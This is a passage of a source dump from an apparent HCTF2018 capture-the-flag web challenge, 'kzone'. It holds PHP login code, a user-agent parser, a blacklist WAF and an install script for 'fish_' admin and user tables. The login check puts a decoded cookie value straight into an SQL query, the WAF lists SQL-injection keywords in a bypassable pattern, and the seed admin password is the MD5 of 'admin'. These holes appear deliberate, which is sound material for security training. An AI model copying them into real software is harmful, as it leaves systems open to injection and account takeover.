11 |             setcookie("login_data", "", time() - 604800);
12 |         }
13 |         $admin_pass = sha1($udata['password'] . LOGIN_KEY);
14 |         if ($admin_pass == $login_data['admin_pass']) {
15 |             $islogin = 1;
16 |         } else {
17 |             setcookie("islogin", "", time() - 604800);
18 |             setcookie("login_data", "", time() - 604800);
19 |         }
20 |     }
21 | }
22 | if (isset($_SESSION['islogin'])) {
23 |     if ($_SESSION["admin_user"]) {
24 |         $admin_user = base64_decode($_SESSION['admin_user']);
25 |         $udata = $DB->get_row("SELECT * FROM fish_admin WHERE username='$admin_user' limit 1");
26 |         $admin_pass = sha1($udata['password'] . LOGIN_KEY);
27 |         if ($admin_pass == $_SESSION["admin_pass"]) {
28 |             $islogin = 1;
29 |         }
30 |     }
31 | }
32 | ?>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/include/os.php:
--------------------------------------------------------------------------------
  1 | <?php 
  2 | function get_device() {  
  3 |     $agent = $_SERVER['HTTP_USER_AGENT'];  
  4 |     $os = false;  
  5 |   
  6 |     if (preg_match('/Windows/i', $agent)) {  
  7 |       $os = 'Windows';  
  8 |     }
  9 |     else if (preg_match('/Coolpad/i', $agent)) {  
 10 |       $os = 'Coolpad';  
 11 |     }
 12 |     else if (preg_match('/MI-ONE|MI \d|HM NOTE/i', $agent)) {  
 13 |       $os = 'Xiaomi';  
 14 |     }
 15 |     else if (preg_match('/(MEIZU (MX|M9)|M030)|MX-3/i', $agent)) {  
 16 |       $os = 'Meizu';  
 17 |     }
 18 |     else if (preg_match('/Huawei/i', $agent)) {  
 19 |       $os = 'Huawei';  
 20 | 	  if (preg_match('/HUAWEI( |\_)?([.0-9a-zA-Z]+)/i', $agent, $regmatch)) {
 21 | 				$os .= " " . $regmatch[2];
 22 | 			}
 23 |     }
 24 |     else if (preg_match('/k-touch/i', $agent)) {  
 25 |       $os = 'K-Touch';  
 26 |     }
 27 | 	else if (preg_match('/Nokia/i', $agent)) {
 28 | 		$os = 'Nokia'; 
 29 | 		if (preg_match('/Nokia(E|N| )?([0-9]+)/i', $agent, $regmatch)) {
 30 | 			if (preg_match('/IEMobile|WPDesktop|Edge/i', $agent)) {
 31 | 				if ($regmatch[2] == '909') {
 32 | 					$regmatch[2] = '1020';
 33 | 				}
 34 | 				$os .= " Lumia " . $regmatch[2];
 35 | 			}
 36 | 			else {
 37 | 				$os .= " " . $regmatch[1] . $regmatch[2];
 38 | 			}
 39 | 		}
 40 | 		else if (preg_match('/Lumia ([0-9]+)/i', $agent, $regmatch)) {
 41 | 			$os .= " Lumia " . $regmatch[1];
 42 | 		}
 43 | 	}
 44 | 	else if (preg_match('/BlackBerry/i', $agent)) {
 45 | 			$os = "BlackBerry";
 46 | 			if (preg_match('/blackberry ?([.0-9a-zA-Z]+)/i', $agent, $regmatch)) {
 47 | 				$os .= " " . $regmatch[1];
 48 | 			}
 49 | 	}
 50 | 	else if (preg_match('/Lenovo|lepad/i', $agent)) {
 51 | 			$os = "Lenovo";
 52 | 			if (preg_match('/Lenovo[\ |\-|\/|\_]([.0-9a-zA-Z]+)/i', $agent, $regmatch)) {
 53 | 				$os .= " " . $regmatch[1];
 54 | 				}
 55 | 				else if (preg_match('/lepad/i', $agent)) {
 56 | 					$os .= ' LePad';
 57 | 				}
 58 | 	}
 59 | 	else if(preg_match('/LG/i', $agent)) {
 60 | 		$os = "LG";
 61 | 		if (preg_match('/LGE?([- \/])([0-9a-zA-Z]+)/i', $agent, $regmatch)) {
 62 | 			$os .= " " . $regmatch[2];
 63 | 		}
 64 | 	}
 65 | 	else if (preg_match('/Galaxy Nexus/i', $agent)) {
 66 | 		$os = "Galaxy Nexus";
 67 | 	}
 68 | 	else if (preg_match('/Smart-?TV/i', $agent)) {
 69 | 		$os = "Samsung Smart TV";
 70 | 	}
 71 | 	else if (preg_match('/GT-/i', $agent)) {
 72 | 		$os = "Samsung";
 73 | 		if (preg_match('/GT-([.\-0-9a-zA-Z]+)/i', $agent, $regmatch)) {
 74 | 			$os .= " " . $regmatch[1];
 75 | 		}
 76 | 	}
 77 | 	else if (preg_match('/Samsung/i', $agent)) {
 78 | 		$os = "Samsung";
 79 | 		if (preg_match('/Samsung-([.\-0-9a-zA-Z]+)/i', $agent, $regmatch)) {
 80 | 			$os .= " " . $regmatch[1];
 81 | 		}
 82 | 	}
 83 |     else if (preg_match('/Android/i', $agent)) {  
 84 |       $os = 'Android';  
 85 |     }
 86 |     else if (preg_match('/linux/i', $agent)) {  
 87 |       $os = 'Linux';  
 88 |     }
 89 | 	else if (preg_match('/iPad/i', $agent)) {
 90 | 		$os = "iPad";
 91 | 		if (preg_match('/CPU\ OS\ ([._0-9a-zA-Z]+)/i', $agent, $regmatch)) {
 92 | 			$os .= " iOS " . str_replace("_", ".", $regmatch[1]);
 93 | 		}
 94 | 	}
 95 | 	else if (preg_match('/iPod/i', $agent)) {
 96 | 		$os = "iPod";
 97 | 		if (preg_match('/iPhone\ OS\ ([._0-9a-zA-Z]+)/i', $agent, $regmatch)) {
 98 | 			$os .= " iOS " . str_replace("_", ".", $regmatch[1]);
 99 | 		}
100 | 	}
101 | 	else if (preg_match('/iPhone/i', $agent)) {
102 | 		$os = "iPhone";
103 | 		if (preg_match('/iPhone\ OS\ ([._0-9a-zA-Z]+)/i', $agent, $regmatch)) {
104 | 			$os .= " iOS " . str_replace("_", ".", $regmatch[1]);
105 | 		}
106 | 	}
107 |     else if (preg_match('/unix/i', $agent)) {  
108 |       $os = 'Unix';  
109 |     }  
110 |     else if (preg_match('/sun/i', $agent) && preg_match('/os/i', $agent)) {  
111 |       $os = 'SunOS';  
112 |     }  
113 |     else if (preg_match('/ibm/i', $agent) && preg_match('/os/i', $agent)) {  
114 |       $os = 'IBM OS/2';  
115 |     }  
116 |     else if (preg_match('/Mac/i', $agent) && preg_match('/PC/i', $agent)) {  
117 |       $os = 'Mac'; 
118 |     }
119 |     else if (preg_match('/offline/i', $agent)) {  
120 |       $os = 'offline';  
121 |     }  
122 |     else{  
123 |       $os = 'unknown';
124 |     }  
125 |     return $os;  
126 | }
127 | ?>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/include/safe.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | function waf($string)
 3 | {
 4 |     $blacklist = '/union|ascii|mid|left|greatest|least|substr|sleep|or|benchmark|like|regexp|if|=|-|<|>|\#|\s/i';
 5 |     return preg_replace_callback($blacklist, function ($match) {
 6 |         return '@' . $match[0] . '@';
 7 |     }, $string);
 8 | }
 9 | 
10 | function safe($string)
11 | {
12 |     if (is_array($string)) {
13 |         foreach ($string as $key => $val) {
14 |             $string[$key] = safe($val);
15 |         }
16 |     } else {
17 |         $string = waf($string);
18 |     }
19 |     return $string;
20 | }
21 | 
22 | foreach ($_GET as $key => $value) {
23 |     if (is_string($value) && !is_numeric($value)) {
24 |         $value = safe($value);
25 |     }
26 |     $_GET[$key] = $value;
27 | }
28 | foreach ($_POST as $key => $value) {
29 |     if (is_string($value) && !is_numeric($value)) {
30 |         $value = safe($value);
31 |     }
32 |     $_POST[$key] = $value;
33 | }
34 | foreach ($_COOKIE as $key => $value) {
35 |     if (is_string($value) && !is_numeric($value)) {
36 |         $value = safe($value);
37 |     }
38 |     $_COOKIE[$key] = $value;
39 | }
40 | unset($cplen, $key, $value);
41 | ?>


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/install.sql:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
 4 | SET time_zone = "+00:00";
 5 | 
 6 | 
 7 | 
 8 | CREATE TABLE IF NOT EXISTS `fish_admin` (
 9 |   `id` tinyint(3) unsigned NOT NULL AUTO_INCREMENT,
10 |   `username` varchar(20) NOT NULL,
11 |   `password` char(32) NOT NULL,
12 |   `name` varchar(255) DEFAULT '',
13 |   `qq` varchar(255) DEFAULT '',
14 |   `per` int(11) NOT NULL DEFAULT '3',
15 |   PRIMARY KEY (`id`),
16 |   UNIQUE KEY `username` (`username`)
17 | ) ENGINE=innodb  DEFAULT CHARSET=utf8 AUTO_INCREMENT=2 ;
18 | 
19 | 
20 | 
21 | INSERT INTO `fish_admin` (`id`, `username`, `password`, `name`, `qq`, `per`) VALUES
22 | (1, 'admin', '21232f297a57a5a743894a0e4a801fc3', '小杰', '1503816935', 1);
23 | 
24 | 
25 | CREATE TABLE IF NOT EXISTS `fish_ip` (
26 |   `id` int(11) NOT NULL AUTO_INCREMENT,
27 |   `admin` int(11) NOT NULL,
28 |   `ip` varchar(30) DEFAULT NULL,
29 |   `addres` varchar(30) DEFAULT NULL,
30 |   `platform` varchar(150) DEFAULT NULL,
31 |   `date` datetime DEFAULT NULL,
32 |   PRIMARY KEY (`id`)
33 | ) ENGINE=innodb DEFAULT CHARSET=utf8;
34 | 
35 | 
36 | CREATE TABLE IF NOT EXISTS `fish_user` (
37 |   `id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,
38 |   `username` varchar(20) NOT NULL,
39 |   `password` char(32) NOT NULL,
40 |   `ip` varchar(15) DEFAULT NULL,
41 |   `address` varchar(30) DEFAULT NULL,
42 |   `time` datetime DEFAULT NULL,
43 |   `device` varchar(255) DEFAULT '',
44 |   `output` int(1) DEFAULT '0',
45 |   PRIMARY KEY (`id`),
46 |   UNIQUE KEY `username` (`username`)
47 | ) ENGINE=innodb DEFAULT CHARSET=utf8;
48 | 


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/robots.txt:
--------------------------------------------------------------------------------
1 | User-agent: 360Spider
2 | User-agent: baiduspider
3 | Disallow: /


--------------------------------------------------------------------------------
/HCTF2018_kzone/web/www.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Li4n0/My-CTF-Challenges/03684eeebcc16d3dd9c653cdb8ba9099876d5bea/HCTF2018_kzone/web/www.zip


--------------------------------------------------------------------------------